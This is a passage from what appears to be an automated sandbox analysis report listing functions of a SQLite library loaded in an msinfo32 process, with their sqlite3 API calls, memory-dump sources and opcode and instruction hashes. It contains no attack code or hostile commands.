                                                                                                              • Opcode Fuzzy Hash: f8570ba3eaa02ecb4d69ff296078f9da58a406b9b54a49e80b9fce7dd43101d3
                                                                                                              • Instruction Fuzzy Hash: 9521A47060C2418BEB01DEAA854235A7BE5AFC5318F35C868CC958B34DE779D842C7B1
                                                                                                              Function 61E3A21A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3A236
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3A243
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3A273
                                                                                                                • Part of subcall function 61E386AE: sqlite3_initialize.SQLITE3 ref: 61E386B4
                                                                                                                • Part of subcall function 61E386AE: sqlite3_vmprintf.SQLITE3 ref: 61E386CE
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3A289
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text$sqlite3_initializesqlite3_mprintfsqlite3_result_errorsqlite3_vmprintf
                                                                                                              • String ID: after rename
                                                                                                              • API String ID: 473106834-392022782
                                                                                                              • Opcode ID: c9b06adbfa5569498b0c89c5cc98cf959d00bb694b5d1585dacfa0990b7871a6
                                                                                                              • Instruction ID: 93932420f2f9d72a3053f1daf622856212aa2b5d9b9ed62dbe10ee1be327cda4
                                                                                                              • Opcode Fuzzy Hash: c9b06adbfa5569498b0c89c5cc98cf959d00bb694b5d1585dacfa0990b7871a6
                                                                                                              • Instruction Fuzzy Hash: A901E9B19087199BCB10DF69C48545EFBE5FFC8764F25C92EE8988B314D735D8418B81
                                                                                                              Function 61E1ADBA Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E1AE12
                                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E1AEB2
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E1ADD9
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E1B041
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mutex_enter
                                                                                                              • String ID:
                                                                                                              • API String ID: 3222813361-0
                                                                                                              • Opcode ID: c4d3cda2f829e27165024916b6315fd7a3adfd645c59f9c1af97f22adbafbe28
                                                                                                              • Instruction ID: d1842d5eb297211b497ba22400c44dcfdef33ac72cb765923e5948d9d22bfeee
                                                                                                              • Opcode Fuzzy Hash: c4d3cda2f829e27165024916b6315fd7a3adfd645c59f9c1af97f22adbafbe28
                                                                                                              • Instruction Fuzzy Hash: BCA1A175D04258CBCB04CFA9D480A9DFBF1BF88314F25C52AE859AB358E774A946CF81
                                                                                                              Function 61E04D99 Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_strnicmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 1961171630-0
                                                                                                              • Opcode ID: e5acedc35c54daf683003af9ce46c994e85d163bbd605fadb6b69f9b9974bca3
                                                                                                              • Instruction ID: 148b629e9419d9b07c58bae5e0771486c8d3c8b3dc046c45d1900ff52e2fbb3a
                                                                                                              • Opcode Fuzzy Hash: e5acedc35c54daf683003af9ce46c994e85d163bbd605fadb6b69f9b9974bca3
                                                                                                              • Instruction Fuzzy Hash: 9451296504C24549E7105ED4868A7A9BBA6AB7230FF74E41FE4A44F391C33AC8FBC742
                                                                                                              Function 61E48817 Relevance: 7.7, APIs: 5, Instructions: 157COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,61E48AC2), ref: 61E48840
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,61E48AC2), ref: 61E489CD
                                                                                                              • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,61E48AC2), ref: 61E489DF
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E489F6
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E489FE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_mutex_leave$sqlite3_mutex_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2921195555-0
                                                                                                              • Opcode ID: 78da0a5a5530f2713a19ba229ce4855c1d1414c30b02fbf605bdcb09aee21b3b
                                                                                                              • Instruction ID: 4130728de6962c10bd1b6296360327d4203421ae4669eeec7903c06275f606a9
                                                                                                              • Opcode Fuzzy Hash: 78da0a5a5530f2713a19ba229ce4855c1d1414c30b02fbf605bdcb09aee21b3b
                                                                                                              • Instruction Fuzzy Hash: 02516E74A04A428BEB00DFA9D8C0A4AB7B1BF88318F29C56DDC999F305D734E851DBD1
                                                                                                              Function 61E3A0DE Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mprintf$sqlite3_freesqlite3_malloc64sqlite3_realloc64
                                                                                                              • String ID:
                                                                                                              • API String ID: 4073198082-0
                                                                                                              • Opcode ID: ec55d9aa39a6ec17642473c7d9dbff0c4f3d0bdfdc91ca2841b41bd3c23e093f
                                                                                                              • Instruction ID: a82cf9ce2def04476f2e3aced76c80e72c605dddc4f7350c5c9cddcf110f3b85
                                                                                                              • Opcode Fuzzy Hash: ec55d9aa39a6ec17642473c7d9dbff0c4f3d0bdfdc91ca2841b41bd3c23e093f
                                                                                                              • Instruction Fuzzy Hash: 444136B0A442258FDF04CF64C88465ABBE1FFC8344F24C569D855CB359E735E991CBA1
                                                                                                              Function 61E36E66 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_result_null.SQLITE3 ref: 61E36E88
                                                                                                              • sqlite3_result_int.SQLITE3 ref: 61E36EA7
                                                                                                              • sqlite3_result_int64.SQLITE3 ref: 61E36F5C
                                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E36F90
                                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E36FCD
                                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E37076
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mallocsqlite3_result_doublesqlite3_result_intsqlite3_result_int64sqlite3_result_nullsqlite3_result_text
                                                                                                              • String ID:
                                                                                                              • API String ID: 402655203-0
                                                                                                              • Opcode ID: 68b4234f911a7bc476c82a290a08e0ded0a049184265c7efeb91a7185fb5d242
                                                                                                              • Instruction ID: e96a647adaf1959e121dc41417d4d0a6412783b100913a6d66dee063aa0ba214
                                                                                                              • Opcode Fuzzy Hash: 68b4234f911a7bc476c82a290a08e0ded0a049184265c7efeb91a7185fb5d242
                                                                                                              • Instruction Fuzzy Hash: BF4179B1D092A98ECB10DFB8C5846ADBBF1ABCD318F65C55EE4949B345C334CA85CB12
                                                                                                              Function 61E3A29D Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E3A2CF
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3A38A
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3A398
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3A3BA
                                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E3A3C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_doublesqlite3_result_error_nomemsqlite3_value_int
                                                                                                              • String ID:
                                                                                                              • API String ID: 2195261611-0
                                                                                                              • Opcode ID: 27cd09f11a8d2756fbc1e0a733aec36e5fb9e23d1848179449a34f622feb73a7
                                                                                                              • Instruction ID: 13cb7f22c9dd1b9d7d577d7a95036dcaebdf666a5f0ab01d230dbf773010e5dc
                                                                                                              • Opcode Fuzzy Hash: 27cd09f11a8d2756fbc1e0a733aec36e5fb9e23d1848179449a34f622feb73a7
                                                                                                              • Instruction Fuzzy Hash: 7F31E470A89729DADF016F91C9805DDBBB0FFC4704F218419E481A6365E77ACCD1CB42
                                                                                                              Function 61E48705 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E13D7F: sqlite3_mutex_try.SQLITE3(?,?,?,61E13DFF), ref: 61E13D1F
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E48769
                                                                                                              • sqlite3_mutex_free.SQLITE3 ref: 61E487AA
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E487BA
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E487E9
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E48808
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                                              • String ID:
                                                                                                              • API String ID: 1894464702-0
                                                                                                              • Opcode ID: 1ad1534d9f7181e422a9b230b04fa6966b755494604c7a3ba899aa73de453e2b
                                                                                                              • Instruction ID: bc5d3c3fc669c60398c4fbc22e0279d9313b92b6db62b980c4a76fd57aa19c88
                                                                                                              • Opcode Fuzzy Hash: 1ad1534d9f7181e422a9b230b04fa6966b755494604c7a3ba899aa73de453e2b
                                                                                                              • Instruction Fuzzy Hash: 28314C34B046428BEB14DFA9D4D491ABBF6BF85308B29C569D844CB319E734E892DB81
                                                                                                              Function 61E2839E Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_log.SQLITE3 ref: 61E283CC
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,61E284E7), ref: 61E283E0
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E284E7), ref: 61E28408
                                                                                                              • sqlite3_log.SQLITE3 ref: 61E28426
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E284E7), ref: 61E2845C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                                              • String ID:
                                                                                                              • API String ID: 1015584638-0
                                                                                                              • Opcode ID: 43830af2103f1e26c36648974e6df6f28ead7415838bfce04ec706d50f6ab6f5
                                                                                                              • Instruction ID: dde754c20b78a30e6692743eddaaba0ea57ee2cd7bb60a1b21ebfa7960af909c
                                                                                                              • Opcode Fuzzy Hash: 43830af2103f1e26c36648974e6df6f28ead7415838bfce04ec706d50f6ab6f5
                                                                                                              • Instruction Fuzzy Hash: 7031CF35604A518FD7009F68C9E0B5A7BE1EF86318F29C5ADEC448F35AD734D8829792
                                                                                                              Function 61E320B2 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E32113
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E32146
                                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E32160
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E32178
                                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E32184
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_str_appendsqlite3_str_appendall$sqlite3_str_appendf
                                                                                                              • String ID:
                                                                                                              • API String ID: 3231710329-0
                                                                                                              • Opcode ID: 2700149ac4cc42c79b53f377862ac290310c44e345dc6213565f4cf80d42f0df
                                                                                                              • Instruction ID: 88fb4ea3a56a3460171f9ba207993a4676bb7444384fa321dbf3aa445ca731b5
                                                                                                              • Opcode Fuzzy Hash: 2700149ac4cc42c79b53f377862ac290310c44e345dc6213565f4cf80d42f0df
                                                                                                              • Instruction Fuzzy Hash: 0E31E2B09096199FDB10DFA8C59478EFBF1BF88314F24C91EE488A7350D775A846CB81
                                                                                                              Function 61E4855F Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E48574
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E4857F
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E48638
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E48643
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1477753154-0
                                                                                                              • Opcode ID: 3e3407540dcc4b204096c56a8e9344bc42823639e99f18194446f8500d157cc9
                                                                                                              • Instruction ID: 3e480464aef0668271979debd699cd64460498f653159f5973ec431030e15fa4
                                                                                                              • Opcode Fuzzy Hash: 3e3407540dcc4b204096c56a8e9344bc42823639e99f18194446f8500d157cc9
                                                                                                              • Instruction Fuzzy Hash: 08214CB4A087418BD700AFA8D480A1ABBF5FF85358F28C85DD8888B345D774D852DBD2
                                                                                                              Function 61E37B02 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E37B10
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E37B28
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E37B4B
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E37B8F
                                                                                                              • sqlite3_memory_used.SQLITE3 ref: 61E37B94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_configsqlite3_initializesqlite3_memory_used
                                                                                                              • String ID:
                                                                                                              • API String ID: 2853221962-0
